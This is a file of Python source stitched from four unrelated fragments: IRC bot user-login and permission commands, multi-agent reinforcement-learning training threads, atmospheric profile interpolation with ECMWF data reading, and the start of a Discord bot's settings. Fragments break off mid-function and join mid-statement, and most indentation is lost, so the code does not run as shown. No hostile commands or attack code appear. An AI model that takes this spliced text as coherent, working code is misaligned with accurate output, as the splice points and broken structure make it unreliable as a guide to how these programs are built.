email = regex.group('email')
try:
user = User.objects.get(username__iexact = username.lower())
except User.DoesNotExist:
user = User(username = username.lower(), email = email)
user.set_password(password)
user.save()
self.msg(chan, "User successfully created")
else:
self.msg(chan, "User already exists in database")
def debugusers(self, regex, chan, nick, **kwargs):
users = self.get_auth().users
for user in users:
self.say(chan, str(user))
self.say(chan, '*** end of debug users ***')
@irc_network_permission_required('bot_admin')
def listusers(self, regex, chan, nick, **kwargs):
self.notice(nick, "List of users....")
for user in User.objects.all():
self.notice(nick, "{} {}".format(user.username, user.email))
self.notice(nick, "==== End of User List =====")
def login(self, regex, chan, nick, **kwargs):
try:
userid = regex.group('userid')
except IndexError:
userid = None
password = regex.group('password')
host = self.get_host(nick)
try:
if userid:
user = User.objects.get(username__iexact = userid.lower())
else:
user = User.objects.get(username__iexact = nick.lower())
except User.DoesNotExist:
self.say(chan, "Invalid Nick")
return
if user.check_password(password):
self.get_auth().add(nick, host, user)
self.say(chan, "Login successful")
self.signal("login", {"nick":nick, "user":user })
else:
self.say(chan, "Login failed")
def logout(self, regex, chan, nick, **kwargs):
username = self.get_auth().get_username(nick)
self.get_auth().remove(nick)
self.say(chan, "Logged out")
self.signal("logout", {"nick":nick, "username":username })
def list_perms(self, regex, chan, nick, **kwargs):
self.notice(nick, "=== Network Permissions ===")
perm_str = ", ".join([p for p,_ in NetworkPermissions._meta.permissions])
self.notice(nick, perm_str)
self.notice(nick, "=== Room Permissions ===")
perm_str = ", ".join([p for p,_ in RoomPermissions._meta.permissions])
self.notice(nick, perm_str)
def perms(self, regex, chan, nick, **kwargs):
username = regex.group('username').lower()
# if user is bot_admin or if user is inquiring about themself...
if self.get_auth().is_authorised(nick, '#', 'bot_admin') or \
(username == nick.lower() and self.get_auth().is_authenticated(nick)):
try:
user = User.objects.get(username__iexact = username)
except User.DoesNotExist:
self.notice(nick, "Unknown user")
return
self.notice(nick, "=== Network Permissions ===")
for net_obj in NetworkPermissions.objects.all():
perms = get_perms(user, net_obj)
self.notice(nick, "{} {}".format(net_obj.network,
", ".join(perms)))
last_perms = None
for room_obj in RoomPermissions.objects.all():
perms = get_perms(user, room_obj)
if perms:
if last_perms == None:
self.notice(nick, "\n=== Room Permissions ===")
self.notice(nick, "{} {} {}".format(room_obj.network,
room_obj.room,
", ".join(perms)))
else:
self.msg(chan, "You are not authorised or not logged in")
@irc_network_permission_required('bot_admin')
def assign_net_perms(self, regex, chan, nick, **kwargs):
username = regex.group('username').lower()
try:
user = User.objects.get(username__iexact = username)
except User.DoesNotExist:
self.say(chan, "Unknown user")
return
permission = regex.group('perm')
perm_obj = None
for perm, desc in NetworkPermissions._meta.permissions:
if perm == permission:
try:
perm_obj = NetworkPermissions.objects.get(network=self.network)
except NetworkPermissions.DoesNotExist:
perm_obj = NetworkPermissions(network=self.network)
perm_obj.save()
break
if perm_obj:
assign_perm(permission, user, perm_obj)
self.say(chan, "Permission assigned successfully")
else:
self.say(chan, "Permission not found")
@irc_network_permission_required('bot_admin')
def unassign_net_perms(self, regex, chan, nick, **kwargs):
username = regex.group('username').lower()
try:
user = User.objects.get(username__iexact = username)
except User.DoesNotExist:
self.say(chan, "Unknown user")
return
permission = regex.group('perm')
perm_obj = None
for perm, desc in NetworkPermissions._meta.permissions:
if perm == permission:
try:
perm_obj = NetworkPermissions.objects.get(network=self.network)
except NetworkPermissions.DoesNotExist:
perm_obj = NetworkPermissions(network=self.network)
perm_obj.save()
break
if perm_obj:
remove_perm(permission, user, perm_obj)
self.say(chan, "Permission removed successfully")
else:
self.say(chan, "Permission not found")
@irc_network_permission_required('bot_admin')
def assign_room_perms(self, regex, chan, nick, **kwargs):
room = regex.group('room')
username = regex.group('username').lower()
try:
user = User.objects.get(username__iexact = username)
except User.DoesNotExist:
self.say(chan, "Unknown user")
return
permission = regex.group('perm')
perm_obj = None
for perm, desc in RoomPermissions._meta.permissions:
if perm == permission:
try:
perm_obj = RoomPermissions.objects.get(network=self.network, room=room.lower())
except RoomPermissions.DoesNotExist:
perm_obj = RoomPermissions(network=self.network, room=room.lower())
perm_obj.save()
break
if perm_obj:
assign_perm(permission, user, perm_obj)
self.say(chan, "Permission assigned successfully")
else:
self.say(chan, "Permission not found")
@irc_network_permission_required('bot_admin')
def unassign_room_perms(self, regex, chan, nick, **kwargs):
room = regex.group('room')
username = regex.group('username').lower()
try:
user = User.objects.get(username__iexact = username)
except User.DoesNotExist:
self.say(chan, "Unknown user")
return
permission = regex.group('perm')
perm_obj = None
        for perm, desc in RoomPermissions._meta.permissions:
            if perm == permission:
                try:
                    perm_obj = RoomPermissions.objects.get(network=self.network, room=room.lower())
                except RoomPermissions.DoesNotExist:
                    perm_obj = RoomPermissions(network=self.network, room=room.lower())
                    perm_obj.save()
                break
        if perm_obj:
            remove_perm(permission, user, perm_obj)
            self.say(chan, "Permission removed successfully")
        else:
            self.say(chan, "Permission not found")
import threading, queue, time, os, pickle
# from queue import Queue
import numpy as np
import tensorflow as tf
import sarnet_td3.common.tf_util as U
from tensorflow.python.keras.backend import set_session
lock = threading.Lock()
class MultiTrainTD3(threading.Thread):
def __init__(self, input_queue, output_queue, args=(), kwargs=None):
threading.Thread.__init__(self, args=(), kwargs=None)
self.input_queue = input_queue
self.output_queue = output_queue
self.daemon = True
self.trainers = args[0]
self.args = args[1]
self.buffer_op = args[2]
self.num_env = args[3]
self.sess = args[4]
self.num_agents = args[5]
self.num_adversaries = args[6]
self.ep_rewards = [[0.0] for _ in range(self.num_env)]
self.ep_end_rewards = [[0.0] for _ in range(self.num_env)]
self.ep_success = [[0.0] for _ in range(self.num_env)]
self.agent_rewards = [[[0.0] for _ in range(self.num_agents)] for _ in range(self.num_env)]
self.agent_info = [[[[]] for i in range(self.num_agents)] for _ in range(self.num_env)]
# self.agent_info = [[[[]]] for _ in range(self.num_env)]
self.final_ep_rewards = [] # Shape: (batch, #) sum of rewards for training curve
self.final_ep_end_rewards = []
self.final_ep_ag_rewards = [] # agent rewards for training curve
self.save_rate = self.args.max_episode_len * 100
self.save_n_ep = self.num_env * 10
self.print_step = -int(self.save_n_ep / self.num_env)
self.q_h_init = np.zeros(shape=(self.num_env, self.args.critic_units))
self.mem_init = np.zeros(shape=(self.num_env, self.args.value_units))
self.time_prev = time.time()
def run(self):
# print(threading.currentThread().getName(), self.receive_messages)
with self.sess.as_default():
# Freeze graph to avoid memory leaks
# self.sess.graph.finalize()
while True:
try:
                    action, p_index, data = self.input_queue.get()
                    # compare strings with ==, not "is": identity comparison
                    # only worked here through CPython string interning
                    if action == "None":  # If you send `None`, the thread will exit.
                        return
                    elif action == "get_action":
                        out = self.get_action(data, p_index)
                        self.output_queue.put(out)
                    elif action == "get_qdebug":
                        out = self.get_qdebug(data, p_index)
                        self.output_queue.put(out)
                    elif action == "get_loss":
                        out = self.get_loss(data, p_index)
                        self.output_queue.put(out)
                    elif action == "write_tboard":
                        self.write_tboard(data)
                    elif action == "add_to_buffer":
                        self.buffer_op.collect_exp(data)
                    elif action == "save_rew_info":
                        self.save_rew_info(data)
                    elif action == "save_benchmark":
                        out = self.save_benchmark(data)
                        self.output_queue.put(out)
                    elif action == "reset_rew_info":
                        self.reset_rew_info()
                    elif action == "save_model_rew":
                        if not (self.args.benchmark or self.args.display):
                            self.save_model(data)
                            self.plot_rewards(data)
except queue.Empty:
continue
def get_action(self, data, p_index):
with lock:
agent = self.trainers[p_index]
obs_n_t, h_n_t, c_n_t, mem_n_t, q1_h_t, is_train = data
obs_n_t = np.stack(obs_n_t, axis=-2) # This returns [agent, batch, dim]
obs_n_t = np.expand_dims(obs_n_t, axis=1) # This adds [agent, time, batch, dim]
p_input_j = agent.prep_input(obs_n_t, h_n_t, c_n_t, mem_n_t, q1_h_t[p_index], is_train)
# print(np.shape(obs_n_t))
act_j_t, state_j_t1, mem_j_t1, attn_j_t = agent.action(p_input_j, is_train)
if self.args.encoder_model == "LSTM" or self.args.encoder_model != "DDPG":
c_j_t1, h_j_t1 = state_j_t1
else:
h_j_t1 = state_j_t1
c_j_t1 = state_j_t1
if agent.comm_type in {"DDPG", "COMMNET", "IC3NET"}:
mem_j_t1 = np.zeros(shape=(self.num_env, self.args.value_units))
return act_j_t, h_j_t1, c_j_t1, mem_j_t1, attn_j_t
def get_qdebug(self, data, p_index):
with lock:
# with sess.as_default():
agent = self.trainers[p_index]
obs_n_t, action_n_t, q1_h_n_t, q2_h_n_t = data
obs_n_t = np.stack(obs_n_t, axis=-2) # This returns [agent, batch, dim]
obs_n_t = np.expand_dims(obs_n_t, axis=1) # This adds [agent, time, batch, dim]
q1_j_input = agent.prep_q_input(obs_n_t, action_n_t, q1_h_n_t[p_index])
_, q1_h_j_t1 = agent.q1_debug['q_values'](*(q1_j_input))
if self.args.td3:
q2_input = agent.prep_q_input(obs_n_t, action_n_t, q2_h_n_t[p_index])
_, q2_h_j_t1 = agent.q2_debug['q_values'](*(q2_input))
else:
q2_h_j_t1 = []
return q1_h_j_t1, q2_h_j_t1
def get_loss(self, data, p_index):
with lock:
# with sess.as_default():
agent = self.trainers[p_index]
train_step = data
loss = agent.update(self.trainers, self.buffer_op, train_step)
return loss
def write_tboard(self, data):
with lock:
loss, train_step, writer, summary_ops, summary_vars, num_agents = data
# Tensorboard
episode_b_rewards = []
for j in range(self.num_env):
if self.args.env_type == "mpe":
episode_b_rewards.append(np.mean(self.ep_rewards[j][self.print_step:]))
else:
episode_b_rewards.append(np.mean(self.ep_success[j][self.print_step:]))
episode_b_rewards = np.mean(np.array(episode_b_rewards))
num_steps = train_step * self.num_env
# Add to tensorboard only when actor agent is updated
if loss[0][1] is not None:
fd = {}
for i, key in enumerate(summary_vars):
if i == 0:
fd[key] = episode_b_rewards
else:
agnt_idx = int((i - 1) / 5)
if agnt_idx == num_agents: agnt_idx -= 1
if loss[agnt_idx] is not None:
fd[key] = loss[agnt_idx][int((i - 1) % 5)]
summary_str = U.get_session().run(summary_ops, feed_dict=fd)
writer.add_summary(summary_str, num_steps)
writer.flush()
def save_rew_info(self, data):
with lock:
rew_n, info_n, ep_step = data
# rew_n (num_env, num_agents)
if self.args.env_type == "mpe":
for j in range(self.num_env):
for i, rew in enumerate(rew_n[j]):
if ep_step >= self.args.max_episode_len - 10: # Compute only last 10 episode step rewards
self.ep_end_rewards[j][-1] += rew
self.ep_rewards[j][-1] += rew
self.agent_rewards[j][i][-1] += rew
elif self.args.env_type == "ic3net":
for j in range(self.num_env):
self.ep_success[j][-1] += info_n[j]
if self.args.benchmark and self.args.env_type == "mpe":
for j in range(self.num_env):
for i, info in enumerate(info_n[j]):
self.agent_info[j][i][-1].append(info)
def reset_rew_info(self):
with lock:
for j in range(self.num_env):
self.ep_rewards[j].append(0)
self.ep_success[j].append(0)
self.ep_end_rewards[j].append(0)
for i in range(self.num_agents):
self.agent_rewards[j][i].append(0)
if self.args.benchmark:
for j in range(self.num_env):
for i in range(self.num_agents):
self.agent_info[j][i].append([[]])
def save_benchmark(self, data):
with lock:
exp_name, exp_itr = data
benchmark_dir = os.path.join('./exp_data', exp_name, exp_itr, self.args.benchmark_dir)
if not os.path.exists(benchmark_dir):
os.mkdir(benchmark_dir)
file_name = './exp_data/' + exp_name + '/' + exp_itr + '/' + self.args.benchmark_dir + '/' + exp_name + '.pkl'
print('Finished benchmarking, now saving...')
# pickle_info = [self.agent_info[j] for j in range(self.num_env)]
with open(file_name, 'wb') as fp:
# Dump files as [num_env, [# agents, [#ep, [#stps, [dim]]]]
pickle.dump(self.agent_info, fp)
return "bench_saved"
def save_model(self, data):
with lock:
# train_step = t_step * num_env
train_step, num_episodes, time_taken, exp_name, exp_itr, data_file, saver = data
# Policy File
if num_episodes % (self.save_n_ep) == 0:
save_dir = './exp_data/' + exp_name + '/' + exp_itr + '/' + self.args.save_dir + str(train_step)
U.save_state(save_dir, self.sess, saver=saver)
# episode_rewards, agent_rewards, final_ep_rewards, final_ep_ag_rewards = rewards
if self.args.env_type == "mpe":
# print statement depends on whether or not there are adversaries
if self.num_adversaries == 0:
episode_b_rewards = []
ep_end_b_rewards = []
ep_ag_b_rewards = []
for j in range(self.num_env):
episode_b_rewards.append(np.mean(self.ep_rewards[j][self.print_step:]))
ep_end_b_rewards.append(np.mean(self.ep_end_rewards[j][self.print_step:]))
episode_b_rewards = np.mean(np.array(episode_b_rewards))
ep_end_b_rewards = np.mean(ep_end_b_rewards) / 10.
for i in range(self.num_agents):
temp_ag_reward = []
for j in range(self.num_env):
temp_ag_reward.append(np.mean(self.agent_rewards[j][i][self.print_step:]))
ep_ag_b_rewards.append(np.mean(np.array(temp_ag_reward)))
print("steps: {}, episodes: {}, mean episode reward: {}, mean end rewards: {}, time: {}".format(
train_step, num_episodes, episode_b_rewards, ep_end_b_rewards, round(time.time() - self.time_prev, 3)))
with open(data_file, "a+") as f:
f.write("\n" + "steps: {}, episodes: {}, mean episode reward: {}, mean end rewards: {}, time: {}".format(
train_step, num_episodes, episode_b_rewards, ep_end_b_rewards, round(time.time() - self.time_prev, 3)) + "\n")
else:
episode_b_rewards = []
ep_end_b_rewards = []
ep_ag_b_rewards = []
for j in range(self.num_env):
episode_b_rewards.append(np.mean(self.ep_rewards[j][self.print_step:]))
ep_end_b_rewards.append(np.mean(self.ep_end_rewards[j][self.print_step:]))
episode_b_rewards = np.mean(np.array(episode_b_rewards))
ep_end_b_rewards = np.mean(ep_end_b_rewards)
for i in range(self.num_agents):
temp_ag_reward = []
for j in range(self.num_env):
temp_ag_reward.append(np.mean(self.agent_rewards[j][i][self.print_step:]))
ep_ag_b_rewards.append(np.mean(np.array(temp_ag_reward)))
print("steps: {}, episodes: {}, mean episode reward: {}, mean end rewards: {}, agent episode reward: {}, time: {}".format(
train_step, num_episodes, episode_b_rewards, ep_end_b_rewards, [rew for rew in ep_ag_b_rewards],
round(time.time() - self.time_prev, 3)) + "\n")
with open(data_file, "a+") as f:
f.write("\n" + "steps: {}, episodes: {}, mean episode reward: {}, mean end rewards: {}, agent episode reward: {}, time: {}".format(
train_step, num_episodes, episode_b_rewards, ep_end_b_rewards, [rew for rew in ep_ag_b_rewards],
round(time.time() - self.time_prev, 3)) + "\n")
# Keep track of final episode reward
self.final_ep_rewards.append(episode_b_rewards)
self.final_ep_end_rewards.append(ep_end_b_rewards)
for rew in ep_ag_b_rewards:
self.final_ep_ag_rewards.append(rew)
self.time_prev = time.time()
def plot_rewards(self, data):
with lock:
train_step, num_episodes, t_start, exp_name, exp_itr, data_file, saver = data
plot_dir = os.path.join('./exp_data', exp_name, exp_itr, self.args.plots_dir)
if not os.path.exists(plot_dir):
os.mkdir(plot_dir)
rew_file_name = './exp_data/' + exp_name + '/' + exp_itr + '/' + self.args.plots_dir + '/' + exp_name + '_rewards.pkl'
with open(rew_file_name, 'wb') as fp:
pickle.dump(self.final_ep_rewards, fp)
rew_ep_end_file_name = './exp_data/' + exp_name + '/' + exp_itr + '/' + self.args.plots_dir + '/' + exp_name + '_rewards_ep_end.pkl'
with open(rew_ep_end_file_name, 'wb') as fp:
pickle.dump(self.final_ep_end_rewards, fp)
agrew_file_name = './exp_data/' + exp_name + '/' + exp_itr + '/' + self.args.plots_dir + '/' + exp_name + '_agrewards.pkl'
with open(agrew_file_name, 'wb') as fp:
pickle.dump(self.final_ep_ag_rewards, fp)
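# A minimal usage sketch for the worker above (hypothetical variable names;
# `trainers`, `run_args`, `buffer_op` and `sess` come from the training script):
#   in_q, out_q = queue.Queue(), queue.Queue()
#   worker = MultiTrainTD3(in_q, out_q,
#                          args=(trainers, run_args, buffer_op, num_env, sess,
#                                num_agents, num_adversaries))
#   worker.start()
#   in_q.put(("get_action", 0, action_payload))  # payload layout as in get_action()
#   act, h, c, mem, attn = out_q.get()
#   in_q.put(("None", None, None))               # ask the worker to exit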
"""
REINFORCE Threads
"""
class MultiTrainVPG(threading.Thread):
def __init__(self, input_queue, output_queue, args=(), kwargs=None):
threading.Thread.__init__(self, args=(), kwargs=None)
self.input_queue = input_queue
self.output_queue = output_queue
self.daemon = True
self.trainers = args[0]
self.args = args[1]
self.buffer_op = args[2]
self.num_env = args[3]
self.sess = args[4]
self.num_agents = args[5]
self.num_adversaries = args[6]
self.ep_rewards = [[0.0] for _ in range(self.num_env)]
self.ep_success = [[0.0] for _ in range(self.num_env)]
self.agent_rewards = [[[0.0] for _ in range(self.num_agents)] for _ in range(self.num_env)]
self.agent_info = [[[[]]] for _ in range(self.num_env)]
self.final_ep_rewards = [] # Shape: (batch, #) sum of rewards for training curve
self.final_ep_ag_rewards = [] # agent rewards for training curve
self.save_rate = self.args.max_episode_len * 100
if self.args.env_type == "mpe":
self.print_step = -int(self.save_rate / self.num_env)
else: # print for episode end only (success rate)
self.print_step = -int(self.save_rate / (self.num_env * self.args.max_episode_len))
self.q_h_init = np.zeros(shape=(self.num_env, self.args.critic_units))
self.mem_init = np.zeros(shape=(self.num_env, self.args.value_units))
self.time_prev = time.time()
def run(self):
# print(threading.currentThread().getName(), self.receive_messages)
with self.sess.as_default():
# Freeze graph to avoid memory leaks
# self.sess.graph.finalize()
while True:
try:
                    action, p_index, data = self.input_queue.get()
                    if action == "None":  # If you send `None`, the thread will exit.
                        return
press_in[press_in.size - 1] < self.atmo["psurf"]:
# extrapolation required
dz = (
np.log(self.atmo["psurf"] / press_in[press_in.size - 1])
* Rgas
* temp_in[temp_in.size - 1]
/ (grav * Mair)
)
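            # hypsometric relation for an isothermal layer: the thickness
            # between pressures p1 > p2 is dz = ln(p1/p2) * R * T / (g * M)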
press_in = np.append(press_in, self.atmo["psurf"])
zalt_in = np.append(zalt_in - dz, 0.0)
temp_in = np.append(temp_in, temp_in[temp_in.size - 1])
air_in = np.append(
air_in,
press_in[press_in.size - 1]
* Avog
* 1.0e-4
/ (Rgas * temp_in[temp_in.size - 1]),
)
o3_in = np.append(o3_in, o3_in[o3_in.size - 1])
o2_in = np.append(o2_in, o2_in[o2_in.size - 1])
h2o_in = np.append(h2o_in, h2o_in[h2o_in.size - 1])
co2_in = np.append(co2_in, co2_in[co2_in.size - 1])
no2_in = np.append(no2_in, no2_in[no2_in.size - 1])
nlev_in = nlev_in - 1
elif press_in[press_in.size - 1] > self.atmo["psurf"]:
# interpolation required
intv = np.searchsorted(
press_in, self.atmo["psurf"]
) # self.atmo['psurf'] is in the interval [press_in[intv], press_in[intv-1]]
press_in = np.append(press_in[0:intv], self.atmo["psurf"])
temp_in = temp_in[0 : intv + 1]
air_in = np.append(
air_in[0:intv],
press_in[press_in.size - 1]
* Avog
* 1.0e-4
/ (Rgas * temp_in[temp_in.size - 1]),
)
o3_in = o3_in[0 : intv + 1]
o2_in = o2_in[0 : intv + 1]
h2o_in = h2o_in[0 : intv + 1]
co2_in = co2_in[0 : intv + 1]
no2_in = no2_in[0 : intv + 1]
zalt_in = zalt_in[0 : intv + 1]
dz = (
np.log(press_in[press_in.size - 1] / press_in[press_in.size - 2])
* Rgas
* temp_in[temp_in.size - 1]
/ (grav * Mair)
)
zalt_in = np.append(zalt_in[0:intv] - zalt_in[intv - 1] + dz, 0)
# Interpolate temperature [K] on output layers
# Flip arrays because our heights are descending
# (from top to bottom), while np.interp expects ascending order
self.atmo["tlev"] = np.flip(
np.interp(np.flip(self.atmo["zlev"]), np.flip(zalt_in), np.flip(temp_in))
)
self.atmo["tlay"] = np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(zalt_in), np.flip(temp_in))
)
# Calculate pressure [hPa] on output levels and layers
self.atmo["plev"] = np.flip(
np.interp(np.flip(self.atmo["zlev"]), np.flip(zalt_in), np.flip(press_in))
)
self.atmo["play"] = np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(zalt_in), np.flip(press_in))
)
# Calculate the vertical column of air above pressure level
# and use this to calculate the partial vertical air columns per layer [#/m^2].
# Partial columns have the advantage that multiplication with cross sections
# yields optical depth.
nlev = len(self.atmo["zlev"])
sp = (
NA / (MDRYAIR * g0) * 1.0e2
) # [#/m^2 * 1/hPa] air column above P is P*NA/Mair/g from p = m*g/area
vc_air = sp * self.atmo["plev"] # air column [#/m^2] above pressure level
self.atmo["AIR"] = vc_air[1:nlev] - vc_air[0 : nlev - 1] # [#/m^2]
self.atmo["AIR"][0] = vc_air[
0
] # [#/m^2] uppermost layer extends to infinity in terms of number of molecules
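        # Sanity check on the magnitudes (assuming NA in #/mol, MDRYAIR in
        # kg/mol and g0 in m/s^2): sp = 6.022e23 / (0.02897 * 9.81) * 1e2
        # ~= 2.12e26 molecules per m^2 per hPa, so a 1013 hPa surface pressure
        # gives a total air column of ~2.15e29 #/m^2 (2.15e25 #/cm^2), the
        # textbook value.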
# Interpolate mole fractions on output height grid
# and then calculate partial columns per layer [#/m^2]
# ozone
self.atmo["O3"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(zalt_in), np.flip(o3_in))
)
* self.atmo["AIR"]
)
# water vapor
self.atmo["H2O"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(zalt_in), np.flip(h2o_in))
)
* self.atmo["AIR"]
)
# co2
self.atmo["CO2"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(zalt_in), np.flip(co2_in))
)
* self.atmo["AIR"]
)
# no2
self.atmo["NO2"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(zalt_in), np.flip(no2_in))
)
* self.atmo["AIR"]
)
# o2 use a constant mixing ratio
self.atmo["O2"] = XO2 * self.atmo["AIR"]
self.atmo["CH4"] = XCH4 * self.atmo["AIR"]
###########################################################
def get_data_ECMWF_ads_egg4(self, filename, month, longitude, latitude):
"""
# Read atmospheric data provided by ECMWF ADS EGG4 run:
# https://ads.atmosphere.copernicus.eu/cdsapp#!/dataset/cams-global-ghg-reanalysis-egg4-monthly
#
# Download script:
#
# import cdsapi
# c = cdsapi.Client()
# c.retrieve(
# 'cams-global-ghg-reanalysis-egg4-monthly',
# {
# 'variable': [
# 'carbon_dioxide', 'geopotential', 'methane',
# 'relative_humidity', 'temperature',
# ],
# 'pressure_level': [
# '1', '2', '3',
# '5', '7', '10',
# '20', '30', '50',
# '70', '100', '150',
# '200', '250', '300',
# '400', '500', '600',
# '700', '800', '850',
# '900', '925', '950',
# '1000',
# ],
# 'year': '2016',
# 'month': [
# '01', '02', '03',
# '04', '05', '06',
# '07', '08', '09',
# '10', '11', '12',
# ],
# 'product_type': 'monthly_mean',
# 'format': 'netcdf',
# },
# 'download.nc'
#
# arguments:
# filename: filepath to ECMWF netcdf file
# month: [01 ... 12]
# longitude [0 ... 360 degree]
# latitude [-90 ... 90 degree]
# returns:
# temp: temperature profile [nlay] [K]
# plev: pressure level profile [nlev] [hPa]
# atmo[tlev]: temperature level profile [nlev] [K]
# atmo[tlay]: temperature layer profile [nlev] [K]
# atmo[plev]: pressure level profile [nlev] [hPa]
# atmo[play]: pressure layer profile [nlay] [hPa]
# atmo[AIR]: air partial column profile [nlay] [#/m^2]
# atmo[H2O]: h2o partial column profile [nlay] [#/m^2]
# atmo[CO2]: co2 partial column profile [nlay] [#/m^2]
        # atmo[CH4]: ch4 partial column profile [nlay] [#/m^2]
# atmo[O2]: o2 partial column profile [nlay] [#/m^2]
"""
        # check whether input is in range
        if not os.path.exists(filename):
            print("ERROR! read_ecmwf_ads_egg4: filename does not exist.")
            raise StopExecution
        if not (1 <= month <= 12
                and -90.0 <= latitude <= 90.0
                and 0.0 <= longitude <= 360.0):
            print("ERROR! read_ecmwf_ads_egg4: input out of range.")
            raise StopExecution
# Open netcdf file
ds = nc.Dataset(filename)
# print(ds.variables)
# Select month index, latitude/longitude index (next neighbour)
itime = int(month - 1)
ilat = np.argmin(abs(ds["latitude"][:] - latitude))
ilon = np.argmin(abs(ds["longitude"][:] - longitude))
# ECMWF: Geopotential [m2 s-2] converted to height [m], approximate use of g0
z_in = np.array([d / g0 for d in ds["z"][itime, :, ilat, ilon]])
nlev_in = z_in.size
# ECMWF: Pressure [hPa]
p_in = ds["level"][:]
# ECMWF: Temperature [K]
temp_in = ds["t"][itime, :, ilat, ilon]
# ECMWF: Humidity [%] converted to water vapor mole fraction [mol/mol] via Clausius-Clapeyron equation
pS = [clausius_clapeyron(Ti) for Ti in temp_in]
# ECMWF: Mole fraction is partial pressure over dry total pressure, partial pressure is rel. hum. * sat. vapor pressure
h2o_in = np.array(
[
d / 100.0 * pSi / (pi - d / 100.0 * pSi)
for d, pSi, pi in zip(ds["r"][itime, :, ilat, ilon], pS, p_in)
]
)
# ECMWF: Carbon dioxide mass mixing ratio [kg kg-1] converted to mole fraction [mol/mol]
co2_in = np.array([d / MCO2 * MDRYAIR for d in ds["co2"][itime, :, ilat, ilon]])
# ECMWF: Methane mass mixing ratio [kg kg-1] converted to mole fraction [mol/mol]
ch4_in = np.array([d / MCH4 * MDRYAIR for d in ds["ch4"][itime, :, ilat, ilon]])
        ds.close()
# Interpolate temperature [K] on output layers
# Flip arrays because our heights are descending
# (from top to bottom), while np.interp expects ascending order
self.atmo["tlay"] = np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(z_in), np.flip(temp_in))
)
self.atmo["tlev"] = np.flip(
np.interp(np.flip(self.atmo["zlev"]), np.flip(z_in), np.flip(temp_in))
)
# Calculate pressure [hPa]
self.atmo["play"] = np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(z_in), np.flip(p_in))
)
self.atmo["plev"] = np.flip(
np.interp(np.flip(self.atmo["zlev"]), np.flip(z_in), np.flip(p_in))
)
# Calculate the vertical column of air above pressure level
# and use this to calculate the partial vertical air columns per layer [#/m^2].
# Partial columns have the advantage that multiplication with cross sections
# yields optical depth.
        nlev = len(self.atmo["zlev"])
sp = (
NA / (MDRYAIR * g0) * 1.0e2
) # [#/m^2 * 1/hPa] air column above P is P*NA/Mair/g from p = m*g/area
vc_air = sp * self.atmo["plev"] # air column [#/m^2] above pressure level
self.atmo["AIR"] = vc_air[1:nlev] - vc_air[0 : nlev - 1] # [#/m^2]
self.atmo["AIR"][0] = vc_air[
0
] # [#/m^2] uppermost layer extends to infinity in terms of number of molecules
# Interpolate mole fractions on output height grid
# and then calculate partial columns per layer [#/m^2]
# water vapor
self.atmo["H2O"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(z_in), np.flip(h2o_in))
)
* self.atmo["AIR"]
)
# co2
self.atmo["CO2"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(z_in), np.flip(co2_in))
)
* self.atmo["AIR"]
)
        # ch4
self.atmo["CH4"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(z_in), np.flip(ch4_in))
)
* self.atmo["AIR"]
)
# o2 use a constant mixing ratio
self.atmo["O2"] = XO2 * self.atmo["AIR"]
###########################################################
class molecular_data:
"""
# The molecular_data class collects method for calculating
# the absorption cross sections of molecular absorbers
#
# CONTAINS
# method __init__(self,wave)
# method get_data_HITRAN(self,xsdbpath, hp_ids)
"""
###########################################################
def __init__(self, wave):
"""
# init class
#
# arguments:
# wave: array of wavelengths [wavelength] [nm]
# xsdb: dictionary with cross section data
"""
self.xsdb = {}
self.wave = wave
###########################################################
def get_data_HITRAN(self, xsdbpath, hp_ids):
"""
        # Download line parameters from the HITRAN web resource via
        # the hapi interface (assumed from the hp_ids argument name)
### TNM-chan ###
### v 21.220 ###
### BEGIN USER-SET VARIABLES ###
# Set your command prefix here.
pre = 'tnm!'
# If you say "colour" instead of "color," change this variable to "True", and I'll change everything accordingly.
useColour = False
# Type your Discord username in quotes, then add your user ID - make sure these are right, because I send both on occasion!
sysop = ''
soID = int()
# Before launching the bot, take note of any moderators that have access to all rooms, and copy their IDs into this list (separated by commas).
opIDs = [
]
# If you want specific server name formatting, add it in surrounded by either 's or "s.
snFormat = ''
# Type your open room names into this list (separated by commas), surrounded by either 's or "s.
openRooms = [
'lobby',
'entroom'
]
# Choose whether or not you'll use debug commands. If you do, type your debug room's name here.
useDebug = True # Make sure this is a boolean ("True" or "False")!
debugSet = 'bot-debug'
# This is your server's color library. Set some color values here and give them names. Here are the ones in the official server.
colorset = {
hex(0xff0000): 'red',
hex(0xe67e22): 'orange',
hex(0xffff00): 'yellow',
hex(0x00ff00): 'green',
hex(0x00ffff): 'teal',
hex(0x0080ff): 'blue',
hex(0x0000ff): 'indigo',
hex(0x9b59b6): 'purple',
hex(0xff00ff): 'magenta',
hex(0xff98ff): 'pink',
hex(0xffffff): 'white',
hex(0x010101): 'black',
### END USER-SET VARIABLES ###
hex(0x000000): 'tooblack', # Don't mess with this entry, it's important! If I try to give the role a pure black color, Discord will replace it with a generic color, which we don't want.
}
# First, I'll import/load libraries.
import traceback
import os
import shelve
import asyncio
from random import choice
### Make sure you've got these modules installed! ###
import termcolor
from dotenv import load_dotenv
import discord
from discord.ext import commands
from discord_components import DiscordComponents, Button, ButtonStyle
# Due to a Discord...thing, I need to set intents now. Thanks, Discord.
intents = discord.Intents.all()
# Next, I'll define some subroutines.
def getKey(vin): # This is for finding a specific value in a color library.
for key, value in colorset.items():
if vin == value:
return key
raise KeyError()
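# For example, getKey('red') returns hex(0xff0000) == '0xff0000' (note that the
# colorset keys are the strings produced by hex(), not integers).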
# Now, the token specified in the .env is used to get in to Discord's APIs.
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
if snFormat: # If you set a name for me to use, I'll use that.
serverName = snFormat
else:
serverName = os.getenv('DISCORD_GUILD')
# I'm setting my command prefix.
bot = commands.Bot(command_prefix=str(pre), intents=intents)
# I'll remove the default "help" command so I can use my own.
bot.remove_command('help')
# Here are some helpers for colored terminal output (raw ANSI escape codes).
def Information(skk): print("\033[97m {}\033[00m" .format(skk)) # Gray
def Success(skk): print("\033[92m {}\033[00m" .format(skk)) # Green
